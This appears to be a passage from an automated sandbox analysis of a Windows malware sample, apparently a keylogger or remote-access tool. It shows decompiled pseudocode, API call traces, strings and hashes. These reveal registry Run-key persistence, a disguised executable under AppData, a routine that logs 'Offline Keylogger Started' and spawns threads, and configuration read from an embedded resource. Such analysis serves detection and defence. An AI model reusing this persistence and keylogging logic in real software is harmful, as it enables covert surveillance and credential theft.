                                        					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        					return _t15;
                                        				}
                                        				return _t13;
                                        			}

                                        APIs
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DA4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                          • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7D5
                                          • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B7E3
                                          • Part of subcall function 0040B7B9: RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                          • Part of subcall function 0040B7B9: RegCloseKey.KERNELBASE(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28), ref: 0040B801
                                          • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DBE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DE8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E02
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E0C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407E2C
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                        • $ZA, xrefs: 00407DD0, 00407D8C
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 00407D5F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID: $ZA$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                        • API String ID: 111787555-3680190401
                                        • Opcode ID: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                        • Opcode Fuzzy Hash: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6F5E5DF0), ref: 00412A90
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                        • String ID:
                                        • API String ID: 3435050692-0
                                        • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                        • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 26%
                                        			E00405180(void* __ecx, char _a4) {
                                        				char _v5;
                                        				char _v6;
                                        				void* _t14;
                                        				void* _t18;
                                        				void* _t19;
                                        				void* _t29;
                                        				void* _t32;
                                        				char* _t33;
                                        				void* _t36;
                                        
                                        				_t19 = __ecx;
                                        				 *((char*)(__ecx + 0x3c)) = 1;
                                        				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
                                        				E00405156(__ecx);
                                        				_t33 = "Offline Keylogger Started";
                                        				if( *0x41b154 != 0x32) {
                                        					_t36 = _t36 - 0x10;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                        					E00405DD3(__ecx);
                                        				}
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
                                        				E0041203B();
                                        				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
                                        				if( *_t19 == 0) {
                                        					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
                                        				}
                                        				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t14;
                                        			}

                                        0x00405185
                                        0x00405190
                                        0x00405194
                                        0x0040519c
                                        0x004051a8
                                        0x004051ad
                                        0x004051af
                                        0x004051b9
                                        0x004051c1
                                        0x004051c1
                                        0x004051d0
                                        0x004051e4
                                        0x004051ea
                                        0x00405204
                                        0x00405208
                                        0x00405214
                                        0x00405214
                                        0x00405220
                                        0x00405225
                                        0x0040522f

                                        APIs
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                        • CreateThread.KERNELBASE(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                        • CreateThread.KERNELBASE(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                        • CreateThread.KERNELBASE(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                        • String ID: Offline Keylogger Started$[INFO]
                                        • API String ID: 2375278975-3749928830
                                        • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                        • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			_entry_(void* __ebx, void* __edi, void* __esi) {
                                        				CHAR* _v8;
                                        				intOrPtr* _v24;
                                        				intOrPtr _v28;
                                        				struct _STARTUPINFOA _v96;
                                        				int _v100;
                                        				char** _v104;
                                        				int _v108;
                                        				void _v112;
                                        				char** _v116;
                                        				intOrPtr* _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr* _t24;
                                        				void* _t27;
                                        				intOrPtr _t36;
                                        				signed int _t38;
                                        				int _t40;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t42;
                                        				intOrPtr _t49;
                                        				intOrPtr* _t54;
                                        				intOrPtr _t57;
                                        				intOrPtr _t60;
                                        
                                        				_push(0xffffffff);
                                        				_push(0x416e50);
                                        				_push(0x414130);
                                        				_push( *[fs:0x0]);
                                        				 *[fs:0x0] = _t57;
                                        				_v28 = _t57 - 0x68;
                                        				_v8 = 0;
                                        				__set_app_type(2);
                                        				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                        				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                        				 *(__p__fmode()) =  *0x41c264;
                                        				_t24 = __p__commode();
                                        				_t47 =  *0x41c260;
                                        				 *_t24 =  *0x41c260;
                                        				 *0x41c268 = _adjust_fdiv;
                                        				_t27 = E00404F3A( *_adjust_fdiv);
                                        				_t60 =  *0x41b190; // 0x1
                                        				if(_t60 == 0) {
                                        					__setusermatherr(E0041412C);
                                        					_pop(_t47);
                                        				}
                                        				E0041411A(_t27);
                                        				_push(0x41b0e8);
                                        				_push(0x41b0e4);
                                        				L00414114();
                                        				_v112 =  *0x41c25c;
                                        				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                        				_push(0x41b0e0);
                                        				_push(0x41b000); // executed
                                        				L00414114(); // executed
                                        				_t54 =  *_acmdln;
                                        				_v120 = _t54;
                                        				if( *_t54 != 0x22) {
                                        					while(1) {
                                        						__eflags =  *_t54 - 0x20;
                                        						if(__eflags <= 0) {
                                        							goto L7;
                                        						}
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        					}
                                        				} else {
                                        					do {
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        						_t42 =  *_t54;
                                        					} while (_t42 != 0 && _t42 != 0x22);
                                        					if( *_t54 == 0x22) {
                                        						L6:
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        					}
                                        				}
                                        				L7:
                                        				_t36 =  *_t54;
                                        				if(_t36 != 0 && _t36 <= 0x20) {
                                        					goto L6;
                                        				}
                                        				_v96.dwFlags = 0;
                                        				GetStartupInfoA( &_v96);
                                        				_t68 = _v96.dwFlags & 0x00000001;
                                        				if((_v96.dwFlags & 0x00000001) == 0) {
                                        					_t38 = 0xa;
                                        				} else {
                                        					_t38 = _v96.wShowWindow & 0x0000ffff;
                                        				}
                                        				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                        				_v108 = _t40;
                                        				exit(_t40);
                                        				_t41 = _v24;
                                        				_t49 =  *((intOrPtr*)( *_t41));
                                        				_v124 = _t49;
                                        				_push(_t41);
                                        				_push(_t49);
                                        				L0041410E();
                                        				return _t41;
                                        			}

                                        0x00413fa7
                                        0x00413fa9
                                        0x00413fae
                                        0x00413fb9
                                        0x00413fba
                                        0x00413fc7
                                        0x00413fcc
                                        0x00413fd1
                                        0x00413fd8
                                        0x00413fdf
                                        0x00413ff2
                                        0x00413ff4
                                        0x00413ffa
                                        0x00414000
                                        0x00414009
                                        0x0041400e
                                        0x00414013
                                        0x00414019
                                        0x00414020
                                        0x00414026
                                        0x00414026
                                        0x00414027
                                        0x0041402c
                                        0x00414031
                                        0x00414036
                                        0x00414040
                                        0x00414059
                                        0x0041405f
                                        0x00414064
                                        0x00414069
                                        0x00414076
                                        0x00414078
                                        0x0041407e
                                        0x004140ba
                                        0x004140ba
                                        0x004140bd
                                        0x00000000
                                        0x00000000
                                        0x004140bf
                                        0x004140c0
                                        0x004140c0
                                        0x00414080
                                        0x00414080
                                        0x00414080
                                        0x00414081
                                        0x00414084
                                        0x00414086
                                        0x00414091
                                        0x00414093
                                        0x00414093
                                        0x00414094
                                        0x00414094
                                        0x00414091
                                        0x00414097
                                        0x00414097
                                        0x0041409b
                                        0x00000000
                                        0x00000000
                                        0x004140a1
                                        0x004140a8
                                        0x004140ae
                                        0x004140b2
                                        0x004140c7
                                        0x004140b4
                                        0x004140b4
                                        0x004140b4
                                        0x004140d3
                                        0x004140d8
                                        0x004140dc
                                        0x004140e2
                                        0x004140e7
                                        0x004140e9
                                        0x004140ec
                                        0x004140ed
                                        0x004140ee
                                        0x004140f5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                        • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00409823(intOrPtr _a4) {
                                        				unsigned int _v8;
                                        				signed char* _v12;
                                        				char _v13;
                                        				void* _v20;
                                        				void* _v24;
                                        				char _v40;
                                        				void* _v56;
                                        				char _v1080;
                                        				void* _t36;
                                        				signed int _t38;
                                        				signed int _t42;
                                        				int _t51;
                                        				signed int _t54;
                                        				signed int _t55;
                                        				signed int _t66;
                                        				signed char* _t76;
                                        				void* _t83;
                                        				void* _t88;
                                        				void* _t89;
                                        
                                        				_v12 = _v12 & 0x00000000;
                                        				_v8 = E00409D02( &_v12);
                                        				_t51 =  *_v12 & 0x000000ff;
                                        				_t36 = malloc(_t51);
                                        				_t76 = _v12;
                                        				_t54 = _t51;
                                        				_t7 = _t76 + 1; // 0x1
                                        				_t88 = _t7;
                                        				_v24 = _t36;
                                        				_t55 = _t54 >> 2;
                                        				memcpy(_t36, _t88, _t55 << 2);
                                        				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                        				_t83 = malloc(_v8);
                                        				_t42 = _v12;
                                        				_v20 = _t83;
                                        				_t20 = _t42 + 1; // 0x1
                                        				_t89 = _t51 + _t20;
                                        				_t66 = _v8 >> 2;
                                        				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
                                        				E00402F9B( &_v1080, _v24, _t51);
                                        				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed
                                        				free(_v20);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}

                                        0x0040982c
                                        0x0040983c
                                        0x00409842
                                        0x00409846
                                        0x0040984c
                                        0x00409853
                                        0x00409855
                                        0x00409855
                                        0x0040985a
                                        0x0040985d
                                        0x00409860
                                        0x00409867
                                        0x00409872
                                        0x0040987e
                                        0x00409887
                                        0x00409892
                                        0x0040989e
                                        0x004098a0
                                        0x004098a4
                                        0x004098aa
                                        0x004098aa
                                        0x004098b1
                                        0x004098be
                                        0x004098c6
                                        0x004098db
                                        0x004098e3
                                        0x004098f1
                                        0x004098fa
                                        0x00409907

                                        APIs
                                          • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                          • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                          • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                          • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        • malloc.MSVCRT ref: 00409846
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                        • malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                        • String ID:
                                        • API String ID: 531887698-0
                                        • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                        • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 28%
                                        			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
                                        				long _t15;
                                        				long _t18;
                                        				void* _t21;
                                        				int _t22;
                                        				void* _t28;
                                        
                                        				_t15 = RegCreateKeyW(_a4, _a8,  &_a8); // executed
                                        				if(_t15 != 0) {
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					return 0;
                                        				} else {
                                        					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
                                        					_t17 = _t15 + _t15 + 2;
